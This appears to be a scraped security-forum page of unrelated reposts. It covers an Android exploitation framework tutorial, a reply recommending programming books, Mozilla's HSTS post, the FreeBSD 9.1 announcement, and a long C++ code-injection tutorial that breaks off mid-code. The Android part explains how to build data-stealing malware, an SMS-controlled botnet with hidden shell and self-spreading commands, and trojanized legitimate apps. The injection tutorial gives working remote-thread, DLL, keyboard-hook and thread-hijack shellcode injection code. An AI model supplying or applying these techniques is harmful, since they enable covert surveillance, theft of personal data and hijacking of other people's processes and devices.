There exist a lot of tools to exploit the security holes in a normal PC environment, but there have been really few tools for the Android environment which are at the same time expandable. By expandable, I'm trying to say that the users who use the framework could build their own modules and share them with the security community.

Android Framework for Exploitation is an open-source project which we have developed in order to increase mobile security research, check for application-based and platform-based vulnerabilities, as well as write plugins for the framework and share them with the community. Subho Halder and I (Aditya Gupta) have developed a framework known as Android Framework for Exploitation, which we released at BlackHat Abu Dhabi in December 2012. The aim of this framework is to help the mobile security community analyze applications, exploit vulnerabilities, build POCs, and share their own modules with other users.

One of the interesting features of this framework is the ability to build malwares, botnets and even inject malwares into existing legitimate applications. This is just to show how ineffective our current mobile anti-malwares are against these types of infected versions of legitimate applications, as at the time of writing none of the anti-malwares for Android detected the malware sample.

Some of the features which we'll be looking into in this post are:
1. Creating a malware
2. Creating a botnet
3. Injecting malicious codes in a legitimate application
4. Analyzing vulnerable applications

Before we go further, let us have a look at the file structure of AFE. Once you download AFE, you will have a structure similar to the one given below. The Input folder will contain all the input apk(s) for any processing, such as crypting the apk to make it undetectable by anti-malwares, inserting the apk in any other legitimate apk, and so on.

Creating a malware

AFE gives users the ability to create malwares for their devices with prebuilt templates. You could also modify the source code of the malware, and modify the GUI of the application apk as you want. To create a malware, first of all you have to launch AFE by typing in ./afe. To get help at any point of time, just type in ? and hit enter.

Note: This tool is made natively for *nix based systems. If you're running Windows, you could use it by installing Cygwin. Also make sure you've got all the dependencies such as Python and the Android SDK installed.

Once you are inside the menu, type in run [the module name] to execute a particular module. In this case, the module is named malware. Once you type in run malware, just type in your local IP address in the Set Reverse IP option. Once you set your reverse IP (same as LHOST), you'll have the option of Stealer. There are 3 predefined stealers, and you can add more yourself. The 3 already existing ones include:
• Call Logs
• Contacts
• Messages

Here's a video of it.

Creating a Botnet

To create a botnet, you have to launch AFE as mentioned earlier, and go on to create a botnet, similar to what we did in the last demo. Once you've created and installed the botnet on any Android based smartphone, you could control it by sending SMS from any phone to the infected phone, and getting the response back using SMS itself. Also, this whole process will go on in the background, so the user won't be able to know if any kind of malicious activity is being performed.

Some of the SMS based commands are:
toast: To display a particular message on the screen
infect: To spread the botnet to any other device by sending an SMS from the already infected device
browse: automatically open a URL on the victim's phone
shell: The most useful command. Could be used to execute any shell based commands. For example, xysec shell cat /proc/version

Note: All the commands should be appended with the keyword 'xysec' - this could be changed by modifying the source of the botnet. This is to make sure the SMS which has been sent as a command won't be displayed in the notifications of the victim.

Analyzing Application for Leaking Content Providers

One of the most important components of Android applications while working with application data is Content Providers. To get the content providers of the application, you could either reverse the application manually, or look for the content providers, or you could use a tool such as Apktool and parse the information based on the filter content://

To find content providers with the help of AFE, you need to place the application you want to analyse in the Input folder. Once we select the application, it will automatically present us with the list of content providers present in the application. After finding out the permission of the content providers, if it is set as exported without any permission checking, the application is vulnerable to the leaking content providers vulnerability.

To make a POC of this vulnerability, we could use the content provider (the vulnerable one) and make another application parsing this content provider. Following is a sample code snippet we made, in which we are accessing the vulnerable application's data using its content provider:

Uri.parse("

We would further update the GitHub repo located at https://github.com/xysec/AFE/ to make POCs automatically.

Injecting malicious codes in legitimate application

Using AFE, you could inject malicious codes in legitimate applications. This is to demonstrate how easy it is for malware authors to create infected versions of legitimate applications, and how anti-malwares should improve their detection strategy to distinguish between fake and legitimate applications.

To create the application:
- Select the malware to be injected
- Choose the target apk
- Type inject

Once we select our target application, it will inject all the services and permissions from our malware (which we have already created) and even sign the newly created application with our key. The newly created file will be stored in /Output under the names [originalapp].apk and [originalapp]_signed.apk.

Creating Plugins for AFE

AFE is an extendable framework, which could be integrated with user-made plugins. To create a plugin, you need to go to the modules directory and create a directory with the name of your plugin. Let us take the example of a plugin named DB Stealer. This plugin grabs all the database files (.db) from the device or emulator and saves them on the system. The code for this plugin has been written in PHP. There are 3 necessary files:
Run.sh
dbstealer.php
dbstealer.info

Run.sh is the initializing code, which will load up the entire code (written in any language, in this case PHP) and execute it. The second file, dbstealer.php, is the main code of the plugin. It is loaded from run.sh with the command php dbstealer.php. The third file, dbstealer.info, will contain the information about the plugin, which will be displayed when the user types in info dbstealer from the afe prompt.

Hope you guys enjoyed the post. Feel free to mail us at security@xysec.com for any bug issues/suggestions/trainings/ideas!

Sursa: Hack Android With Android Exploitation Framework | Learn How To Hack - Ethical Hacking and security tips
-
Can I recommend something? They're called "books".

Java de la 0 la expert (Necartonat) - Stefan Tanasa, Cristian Olaru, Stefan Andrei POL978-973-46-2405-8 - eMAG.ro
Totul despre C si C++ manualul fundamental de programare in C si C++ - Kris Jamsa, Lars Klander TEO973-601-911-X - eMAG.ro
C++ introducere in standard template library ALL973-571-798-8 - eMAG.ro
Programare web in Bash si Perl - Sabin Buraga, Victor Tarhon-Onu, Stefan Tanasa POL973-683-931-1 - eMAG.ro
Sql - Marin Fotache POL973-683-709-2 - eMAG.ro
Tehnici De Web Design MCO973-000-000-19 - eMAG.ro
Limbajul C# pentru incepatori - Notiuni de baza - Liviu Negrescu, Lavinia Negrescu ALB973-650-153-1 - eMAG.ro
Secrete C++ - Constantin Galatan ALB973-650-186-8 - eMAG.ro

And there are very many of them, very detailed; I guarantee you will understand. It is best to also put into practice what you find in them as you read.
-
[h=1]HTTP Strict Transport Security[/h] The lack of (or inconsistent use of) SSL puts users’ security and privacy at risk. Increasingly, popular sites require SSL not only for operations which are known to directly involve private data (login, etc) but for entire sessions. This is a good thing. Unfortunately, there are a number of techniques an attacker can use to work around this. The most well known of these is SSL-Stripping in which an active man-in-the-middle can intercept traffic between the browser and the server, downgrading what should be an HTTPS connection to an unencrypted HTTP connection. HSTS (HTTP Strict Transport Security) is designed to make attacks like this harder; it allows servers to specify that all subsequent connections must be made via HTTPS for a specified period of time. If a request is made over HTTP it will be automatically upgraded by the browser. Also, if the SSL certificate for an HSTS enabled site can’t be verified, the requested document won’t be loaded. There’s a gap in this protection though; if your initial connection to a site is intercepted, not only could your connection still be downgraded but the attacker could also stop the browser from seeing the HSTS header too. This can be resolved for popular sites that use HSTS by means of an in-browser preload list (coming soon in Firefox 17 – currently in Beta). You can read more about preloading HSTS in our earlier post on the subject. Firefox has supported HSTS since version 4; we think it’s about time your site did too. You can learn more about HSTS and how to implement it in this article on MDN. Sursa: HTTP Strict Transport Security | Mozilla Security Blog
-
FreeBSD 9.1-RELEASE Announcement

The FreeBSD Release Engineering Team is pleased to announce the availability of FreeBSD 9.1-RELEASE. This is the second release from the stable/9 branch, which improves on the stability of FreeBSD 9.0 and introduces some new features. Some of the highlights:

- New Intel GPU driver with GEM/KMS support
- netmap(4) fast userspace packet I/O framework
- ZFS improvements from illumos project
- CAM Target Layer, a disk and processor device emulation subsystem
- Optional new C++11 stack including LLVM libc++ and libcxxrt
- Jail devfs, nullfs, zfs mounting and configuration file support
- POSIX2008 extended locale support, including compatibility with Darwin extensions
- oce(4) driver for Emulex OneConnect 10Gbit Ethernet card
- sfxge(4) driver for 10Gb Ethernet adapters based on Solarflare SFC9000 controller
- Xen Paravirtualized Backend Ethernet Driver (netback) improvement
- hpt27xx(4) driver for HighPoint RocketRAID 27xx-based SAS 6Gb/s HBA
- GEOM multipath class improvement
- GEOM raid class is enabled by default supporting software RAID by deprecated ataraid(8)
- kernel support for the AVX FPU extension
- Numerous improvements in IPv6 hardware offload support

Please note that precompiled third-party packages are not available for 9.1-RELEASE at the time of release. See the Availability section below for further details.

For a complete list of new features and known problems, please see the online release notes and errata list available at:
FreeBSD 9.1-RELEASE Release Notes
FreeBSD 9.1-RELEASE Errata

For more information about FreeBSD release engineering activities please see: Release Engineering Information

Sursa: FreeBSD 9.1-RELEASE Announcement
-
[h=1]Code Injections [beginner and advanced][/h]Author: [h=3]RosDevil[/h] This tutorial is for every level, from beginners to advanced (so to review some aspects or istructions) I will use as much as i can C++ in this tutorial. We're going through all kinds of injection. Before any type of injection we need to get the right privileges, SE_DEBUG_NAME, this is the function to get it: int privileges(){ HANDLE Token; TOKEN_PRIVILEGES tp; if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&Token)) { LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL)==0){ return 1; //FAIL }else{ return 0; //SUCCESS } } return 1; } after we need the PID of the target application, it can be got so: DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(!strcmp(pt.szExeFile, procName.c_str())){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } now let's get started with injections: 1) Codecave Injection with CreateRemoteThread() This method has been treated a lot on internet so i won't go through the code step by step, if you want to see the documented functions go to msdn. 
steps: - Open the target Process through the PID (Api used: OpenProcess()) - Allocate space in the remote process for our function and parameters (Api used: VirtualAllocEx()) - Write our function and parameters in the remote process (Api used: WriteProcessMemory()) - Execute the remote code and optionally free the remote memory (Api used: CreateRemoteThread() and VirtualFree()) #include <windows.h> #include <iostream> #include <fstream> #include <stdlib.h> #include "ntdef.h" #include <tlhelp32.h> typedef int (WINAPI* MsgBoxParam)(HWND, LPCSTR, LPCSTR, UINT); using namespace std; struct PARAMETERS{ DWORD MessageBoxInj; char text[50]; char caption[25]; int buttons; // HWND handle; }; DWORD getPid(string procName); int privileges(); DWORD myFunc(PARAMETERS * myparam); DWORD Useless(); int main() { privileges(); DWORD pid = getPid("notepad.exe"); if (pid==0) return 1; //error HANDLE p; p = OpenProcess(PROCESS_ALL_ACCESS,false,pid); if (p==NULL) return 1; //error char * mytext = "Hello by CodeCave!"; char * mycaption = "Injection result"; PARAMETERS data; //let's fill in a PARAMETERS struct HMODULE user32 = LoadLibrary("User32.dll"); data.MessageBoxInj = (DWORD)GetProcAddress(user32, "MessageBoxA"); strcpy(data.text, mytext); strcpy(data.caption, mycaption); data.buttons = MB_OKCANCEL | MB_ICONQUESTION; DWORD size_myFunc = (PBYTE)Useless - (PBYTE)myFunc; //this gets myFunc's size //--------now we are ready to inject LPVOID MyFuncAddress = VirtualAllocEx(p, NULL, size_myFunc, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); WriteProcessMemory(p, MyFuncAddress, (void*)myFunc,size_myFunc, NULL); LPVOID DataAddress = VirtualAllocEx(p,NULL,sizeof(PARAMETERS),MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE); WriteProcessMemory(p, DataAddress, &data, sizeof(PARAMETERS), NULL); HANDLE thread = CreateRemoteThread(p, NULL, 0, (LPTHREAD_START_ROUTINE)MyFuncAddress, DataAddress, 0, NULL); if (thread!=0){ //injection completed, not we can wait it to end and free the memory 
WaitForSingleObject(thread, INFINITE); //this waits untill thread thread has finished VirtualFree(MyFuncAddress, 0, MEM_RELEASE); //free myFunc memory VirtualFree(DataAddress, 0, MEM_RELEASE); //free data memory CloseHandle(thread); CloseHandle(p); //don't wait for the thread to finish, just close the handle to the process cout<<"Injection completed!"<<endl; }else{ cout<<"Error!"<<endl; } system("PAUSE"); return EXIT_SUCCESS; } DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(pt.szExeFile == procName){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } DWORD myFunc(PARAMETERS * myparam){ MsgBoxParam MsgBox = (MsgBoxParam)myparam->MessageBoxInj; int result = MsgBox(0, myparam->text, myparam->caption, myparam->buttons); switch(result){ case IDOK: //your code break; case IDCANCEL: //your code break; } return 0; } DWORD Useless(){ return 0; } //this function is needed to get some extra privileges so your code will be able to work without conflicts with the system int privileges(){ HANDLE Token; TOKEN_PRIVILEGES tp; if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&Token)) { LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL)==0){ return 1; //FAIL }else{ return 0; //SUCCESS } } return 1; } This code shows that we cannot pass more than 1 parameter to CreateRemoteThread so we need to create a struct (PARAMETERS) and pass it to the remote function I did a tutorial in past for this, check out: http://www.rohitab.c...ion-tutorial-c/ NOTE FOR VISTA/WIN7 CreateRemoteThread() for windows Vista and Windows 7 isn't working because of boundaries, the solution is the undocumented function NtCreateThreadEx(), 
we can get it from ntdll.dll, and replace CreateRemoteThread() with it in the above code (and remember to adjust the parameters) HANDLE NtCreateThreadEx(HANDLE process, LPTHREAD_START_ROUTINE Start, LPVOID lpParameter); typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx) ( OUT PHANDLE hThread, IN ACCESS_MASK DesiredAccess, IN LPVOID ObjectAttributes, IN HANDLE ProcessHandle, IN LPTHREAD_START_ROUTINE lpStartAddress, IN LPVOID lpParameter, IN BOOL CreateSuspended, IN DWORD StackZeroBits, IN DWORD SizeOfStackCommit, IN DWORD SizeOfStackReserve, OUT LPVOID lpBytesBuffer ); struct NtCreateThreadExBuffer { ULONG Size; ULONG Unknown1; ULONG Unknown2; PULONG Unknown3; ULONG Unknown4; ULONG Unknown5; ULONG Unknown6; PULONG Unknown7; ULONG Unknown8; }; HANDLE NtCreateThreadEx(HANDLE process, LPTHREAD_START_ROUTINE Start, LPVOID lpParameter){ HMODULE modNtDll = LoadLibrary("ntdll.dll"); if(!modNtDll){ cout<<"Error loading ntdll.dll"<<endl; return 0; } LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx) GetProcAddress(modNtDll, "NtCreateThreadEx"); if(!funNtCreateThreadEx){ cout<<"Error loading NtCreateThreadEx()"<<endl; return 0; } NtCreateThreadExBuffer ntbuffer; memset (&ntbuffer,0,sizeof(NtCreateThreadExBuffer)); DWORD temp1 = 0; DWORD temp2 = 0; ntbuffer.Size = sizeof(NtCreateThreadExBuffer); ntbuffer.Unknown1 = 0x10003; ntbuffer.Unknown2 = 0x8; ntbuffer.Unknown3 = &temp2; ntbuffer.Unknown4 = 0; ntbuffer.Unknown5 = 0x10004; ntbuffer.Unknown6 = 4; ntbuffer.Unknown7 = &temp1; // ntbuffer.Unknown8 = 0; HANDLE hThread; NTSTATUS status = funNtCreateThreadEx( &hThread, 0x1FFFFF, NULL, process, (LPTHREAD_START_ROUTINE) Start, lpParameter, FALSE, //start instantly 0, //null 0, //null 0, //null &ntbuffer ); return hThread; } //so to use in the above code like this: HANDLE thread = NtCreateThreadEx(p, (LPTHREAD_START_ROUTINE)MyFuncAddress, DataAddress); // // DLL INJECTION Performing Dll injection is much more easier, we don't have to create a struct of parameters 
beacause LoadLibraryA has only 1 parameter #include <windows.h> #include <iostream> #include <fstream> #include <stdlib.h> #include "ntdef.h" #include <tlhelp32.h> //For Vista/Win7: HANDLE NtCreateThreadEx(HANDLE process, LPTHREAD_START_ROUTINE Start, LPVOID lpParameter); using namespace std; DWORD getPid(string procName); int privileges(); int main() { privileges(); //don't mind of the result, because maybe it fails because you already have that privilege DWORD pid = getPid("notepad.exe"); if (pid==0) return 1; //error HANDLE p; p = OpenProcess(PROCESS_ALL_ACCESS,false,pid); if (p==NULL) return 1; //error char * dll = "C:\\mydll.dll" //--------now we are ready to inject unsigned long LoadLib = (unsigned long)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); LPVOID DataAddress = VirtualAllocEx(p, NULL, strlen(dll) + 1, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(p, DataAddress, dll, strlen(dll), NULL); HANDLE thread = CreateRemoteThread(p, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLib, DataAddress, 0, NULL); //For Vista/Win7 //HANDLE thread = NtCreateThreadEx(p, (LPTHREAD_START_ROUTINE)LoadLib, DataAddress); if (thread!=0){ //injection completed WaitForSingleObject(thread, INFINITE); //this waits untill thread thread has finished VirtualFree(MyFuncAddress, 0, MEM_RELEASE); //free myFunc memory VirtualFree(DataAddress, 0, MEM_RELEASE); //free data memory CloseHandle(thread); CloseHandle(p); //don't wait for the thread to finish, just close the handle to the process cout<<"Injection completed!"<<endl; }else{ cout<<"Error!"<<endl; } system("PAUSE"); return EXIT_SUCCESS; } DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(pt.szExeFile == procName){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } int privileges(){ HANDLE Token; TOKEN_PRIVILEGES tp; 
if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&Token)) { LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL)==0){ return 1; //FAIL }else{ return 0; //SUCCESS } } return 1; } //for VISTA/WIN7 typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx) ( OUT PHANDLE hThread, IN ACCESS_MASK DesiredAccess, IN LPVOID ObjectAttributes, IN HANDLE ProcessHandle, IN LPTHREAD_START_ROUTINE lpStartAddress, IN LPVOID lpParameter, IN BOOL CreateSuspended, IN DWORD StackZeroBits, IN DWORD SizeOfStackCommit, IN DWORD SizeOfStackReserve, OUT LPVOID lpBytesBuffer ); struct NtCreateThreadExBuffer { ULONG Size; ULONG Unknown1; ULONG Unknown2; PULONG Unknown3; ULONG Unknown4; ULONG Unknown5; ULONG Unknown6; PULONG Unknown7; ULONG Unknown8; }; HANDLE NtCreateThreadEx(HANDLE process, LPTHREAD_START_ROUTINE Start, LPVOID lpParameter){ HMODULE modNtDll = LoadLibrary("ntdll.dll"); if(!modNtDll){ cout<<"Error loading ntdll.dll"<<endl; return 0; } LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx) GetProcAddress(modNtDll, "NtCreateThreadEx"); if(!funNtCreateThreadEx){ cout<<"Error loading NtCreateThreadEx()"<<endl; return 0; } NtCreateThreadExBuffer ntbuffer; memset (&ntbuffer,0,sizeof(NtCreateThreadExBuffer)); DWORD temp1 = 0; DWORD temp2 = 0; ntbuffer.Size = sizeof(NtCreateThreadExBuffer); ntbuffer.Unknown1 = 0x10003; ntbuffer.Unknown2 = 0x8; ntbuffer.Unknown3 = &temp2; ntbuffer.Unknown4 = 0; ntbuffer.Unknown5 = 0x10004; ntbuffer.Unknown6 = 4; ntbuffer.Unknown7 = &temp1; // ntbuffer.Unknown8 = 0; HANDLE hThread; NTSTATUS status = funNtCreateThreadEx( &hThread, 0x1FFFFF, NULL, process, (LPTHREAD_START_ROUTINE) Start, lpParameter, FALSE, //start instantly 0, //null 0, //null 0, //null &ntbuffer ); return hThread; } so if we want to check which OS are we running so to use CreateRemoteThread and 
NtCreateThreadEx: int CheckOSVersion() { /* * Windows XP = 1 (NT 5.0) * Windows Vista = 2 (NT 6.0) * Windows 7 = 3 (NT 6.1) * Windows 8 = 4 (NT 6.2) --> on Windows 8 CreateRemoteThread works perfectly!! */ OSVERSIONINFO osver; osver.dwOSVersionInfoSize = sizeof(osver); if (GetVersionEx(&osver)) { if (!(osver.dwPlatformId == VER_PLATFORM_WIN32_NT)) return 0; if (osver.dwMajorVersion == 5) return 1; if (osver.dwMajorVersion == 6 && osver.dwMinorVersion == 0) return 2; if (osver.dwMajorVersion == 6 && osver.dwMinorVersion == 1) return 3; if (osver.dwMajorVersion == 6 && osver.dwMinorVersion == 2) return 4; } else return 0; } //use: char type[50]; int os = CheckOSVersion(); if (os == 0) return 0; if (os==1) strcpy(type, "Windows XP"); if (os==2) strcpy(type, "Windows Vista"); if (os==3) strcpy(type, "Windows 7"); if (os==4) strcpy(type, "Windows 8"); if you want to check if you are on a 64bit or 32bit OS by code: //the size of void* is the answer if (sizeof(void*) == 4) //is 32bit if (sizeof(void*) == 8) //is 64bit Other way I found many people talking about RtlCreateUserThread(), well it can be implemented easily (it is in ntdll.dll), but has a flaw, if you inject a dll with this function you cannot use CreateThread() inside it but you need to implement RtlCreateUserThread() in the dll too; i don't know why but it is. 
The implementation is: typedef struct ID{ PVOID UniqueProcess; PVOID UniqueThread; } CLIENT_ID, *PCLIENT_ID; typedef long (*myRtlCreateUserThread) (HANDLE, PSECURITY_DESCRIPTOR, BOOLEAN, ULONG, PULONG, PULONG, PVOID, PVOID, PHANDLE, PCLIENT_ID); myRtlCreateUserThread RtlCreateUserThread; RtlCreateUserThread=(myRtlCreateUserThread)GetProcAddress(GetModuleHandle("ntdll.dll"),"RtlCreateUserThread"); IMPORTANT: 32-BIT / 64-BIT This is a portability-injection table: - 32bit program inject 32bit dll in a 32bit target - 32bit program inject 64bit dll in a 64bit target - 64bit program inject 32bit dll in a 32bit target - 64bit program inject 64bit dll in a 64bit target the first type and the fourth type are easy to code, but if you dare getting in troubles with the second and the third take a look at this paper: http://www.corsix.or...ction-and-wow64 2) Code injection with SetWindowsHookEx Setting hooks is a tipical action of keyloggers over WH_KEYBOARD hook type. This method makes them perfect in capturing key strokes BUT if we inject a dll using hooks the program that set the hook must keep running otherwise the dll is suddenly unloaded. To perform this type of injection we don't need directly the PID of the process but the Thread ID of it. 
We obtain the Thread ID from the PID:

    DWORD GetThreadID(DWORD pid) {
        HANDLE hsnap;
        THREADENTRY32 pt;
        hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
        pt.dwSize = sizeof(THREADENTRY32);
        if (Thread32First(hsnap, &pt)) {            // the first entry must be fetched with Thread32First
            do {
                if (pt.th32OwnerProcessID == pid) {
                    DWORD Thpid = pt.th32ThreadID;
                    CloseHandle(hsnap);
                    return Thpid;
                }
            } while (Thread32Next(hsnap, &pt));
        }
        CloseHandle(hsnap);
        return 0;
    }

Now let's jot down some code about SetWindowsHookEx():

    #include <cstdlib>
    #include <cstring>
    #include <iostream>
    #include "windows.h"
    #include "tlhelp32.h"
    using namespace std;

    DWORD getPid(string procName);
    DWORD GetThreadID(DWORD pid);

    int main(int argc, char *argv[])
    {
        HHOOK hproc;
        HOOKPROC cbt;
        HMODULE dll = LoadLibrary("DllHook.dll");               // the dll that we will inject, which contains the hook procedure
        cbt = (HOOKPROC)GetProcAddress(dll, "MyProcedure");      // get the address of our procedure
        DWORD id = GetThreadID(getPid("notepad.exe"));           // in this example we want to set the hook in a specific target
        if (id == 0) return 0;                                   // id == 0 means that the process isn't running
        hproc = SetWindowsHookEx(WH_KEYBOARD, cbt, dll, id);     // to set the hook in every process we could replace 'id' with 0
        cin.get();
        UnhookWindowsHookEx(hproc);                              // when we want to remove the hook
        return EXIT_SUCCESS;
    }

    DWORD GetThreadID(DWORD pid) {
        HANDLE hsnap;
        THREADENTRY32 pt;
        hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
        pt.dwSize = sizeof(THREADENTRY32);
        if (Thread32First(hsnap, &pt)) {            // Thread32First must precede Thread32Next
            do {
                if (pt.th32OwnerProcessID == pid) {
                    DWORD Thpid = pt.th32ThreadID;
                    CloseHandle(hsnap);
                    return Thpid;
                }
            } while (Thread32Next(hsnap, &pt));
        }
        CloseHandle(hsnap);
        return 0;
    }

    DWORD getPid(string procName) {
        HANDLE hsnap;
        PROCESSENTRY32 pt;
        hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        pt.dwSize = sizeof(PROCESSENTRY32);
        if (Process32First(hsnap, &pt)) {           // Process32First fills the first entry; pt is uninitialized before it
            do {
                if (!strcmp(pt.szExeFile, procName.c_str())) {
                    DWORD pid = pt.th32ProcessID;
                    CloseHandle(hsnap);
                    return pid;
                }
            } while (Process32Next(hsnap, &pt));
        }
        CloseHandle(hsnap);
        return 0;
    }

Now our Dll that contains the hook procedure (in this case it is named DllHook.dll):

    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>

    __declspec(dllexport) LRESULT WINAPI MyProcedure(int code, WPARAM wp, LPARAM lp);

    __declspec(dllexport) LRESULT WINAPI MyProcedure(int code, WPARAM wp, LPARAM lp) {
        //here goes our code
        return CallNextHookEx(NULL, code, wp, lp);   //this is needed to let other applications set other hooks on this target
    }

    BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved)
    {
        switch (reason) {
            case DLL_PROCESS_ATTACH: break;
            case DLL_PROCESS_DETACH: break;
            case DLL_THREAD_ATTACH:  break;
            case DLL_THREAD_DETACH:  break;
        }
        /* Returns TRUE on success, FALSE on failure */
        return TRUE;
    }

3) Code Injection modifying the Main Thread

This part is a bit more complicated, but it works on any version of WINDOWS and doesn't need to keep the injector running.

Steps:
- Open the target process through the PID (API used: OpenProcess())
- Allocate space in the remote process for our function and parameters (API used: VirtualAllocEx())
- Get the target process's thread ID
- Open the remote thread and suspend it (APIs used: OpenThread() and SuspendThread())
- Get the remote thread context (API used: GetThreadContext())
- Save the current Eip and set it to the address of our injected function
- Write our function and parameters in the remote process (API used: WriteProcessMemory())
- PATCH AT RUNTIME the injected function with the addresses of our parameters (API used: WriteProcessMemory())
- Set the new remote thread context (API used: SetThreadContext())
- Resume the remote thread and optionally free the memory (API used: ResumeThread())

Before seeing the code I want to explain what our function will be. It is an assembly code (or shellcode) that performs our operation, but while coding we can't know the addresses of our parameters, so we put placeholders: in other words, we put a label that will be replaced during execution with the right addresses.
The assembly function is:

    push 0xACEACEAC      ;-> placeholder for the address of our old EIP
    pushfd               ;-> save all flags
    pushad               ;-> save all registers
    push 0xACEACEAC      ;-> placeholder for the address of the string 'User32.dll'
    mov ecx, 0xACEACEAC  ;-> placeholder for the address of LoadLibraryA
    call ecx             ;-> translated in C++: LoadLibrary("User32.dll")
    ;now the address of the LOADED LIBRARY User32.dll is in the eax register
    push 0xACEACEAC      ;-> placeholder for the address of the string MessageBoxA
    push eax             ;-> push the User32.dll module handle onto the stack
    mov edx, 0xACEACEAC  ;-> placeholder for the address of GetProcAddress
    call edx             ;translated in C++: GetProcAddress(LoadLibrary("User32.dll"), "MessageBoxA")
    ;now the address of MessageBoxA is in the eax register
    push 0               ;push the fourth parameter of MessageBoxA (MB_OK)
    push 0xACEACEAC      ;-> placeholder for the address of the caption (3rd parameter)
    push 0xACEACEAC      ;-> placeholder for the address of the text (2nd parameter)
    push 0               ;push the first parameter onto the stack (don't bother)
    call eax             ;translated in C++: MessageBoxA(0, text, caption, MB_OK)
    popad                ;restore all the registers
    popfd                ;restore all the flags
    ret                  ;get back to the right execution

As I said before, we can inject an assembly code or shellcode (they behave in the same way), so that assembly code converted into shellcode is:

    char shellcode[] = "\x68\xac\xce\xea\xac\x9c\x60\x68\xac\xce\xea\xac\xb9\xac\xce\xea\xac\xff\xd1\x68\xac\xce\xea\xac\x50\xba\xac\xce\xea\xac\xff\xd2\x6a\x00\x68\xac\xce\xea\xac\x68\xac\xce\xea\xac\x6a\x00\xff\xd0\x61\x9d\xc3";

Now let's see the real full code:

    #include <windows.h>
    #include <iostream>
    #include <fstream>
    #include <stdlib.h>
    #include <tlhelp32.h>
    #include <shlwapi.h>
    #pragma comment(lib, "shlwapi.lib")
    using namespace std;

    int privileges();
    DWORD getPid(string procName);
    DWORD GetThreadID(DWORD pid);
    __declspec(naked) void myFunc();
    __declspec(naked) void Useless();

    int main()
    {
        privileges();
        unsigned long oldIP;
        DWORD pid = getPid("notepad.exe");
        if (pid == 0) return 1;
        cout << pid << endl;
        HANDLE p;
        p = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
        if (p == NULL) return 1;   //error

        const char * user32 = "User32.dll";
        const char * MsgBox = "MessageBoxA";
        const char * testo = "REPORT";                        //caption
        const char * mex = "INJECTION THREAD: SUCCESS!";      //text

        unsigned long size_myFunc = (unsigned long)Useless - (unsigned long)myFunc;
        unsigned long GetProcAdr = (unsigned long)GetProcAddress(GetModuleHandle("kernel32.dll"), "GetProcAddress");
        unsigned long Load32 = (unsigned long)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");

        void * mexAddress = VirtualAllocEx(p, NULL, strlen(mex)+1, MEM_COMMIT, PAGE_READWRITE);
        void * testoAddress = VirtualAllocEx(p, NULL, strlen(testo)+1, MEM_COMMIT, PAGE_READWRITE);
        void * MsgboxAddress = VirtualAllocEx(p, NULL, strlen(MsgBox)+1, MEM_COMMIT, PAGE_READWRITE);
        void * DataAddress = VirtualAllocEx(p, NULL, strlen(user32)+1, MEM_COMMIT, PAGE_READWRITE);
        void * MyFuncAddress = VirtualAllocEx(p, NULL, size_myFunc, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

        WriteProcessMemory(p, DataAddress, user32, strlen(user32), NULL);     //string User32.dll
        WriteProcessMemory(p, MsgboxAddress, MsgBox, strlen(MsgBox), NULL);   //string MessageBoxA
        WriteProcessMemory(p, testoAddress, testo, strlen(testo), NULL);      //string for caption
        WriteProcessMemory(p, mexAddress, mex, strlen(mex), NULL);            //string for text

        DWORD thID = GetThreadID(pid);
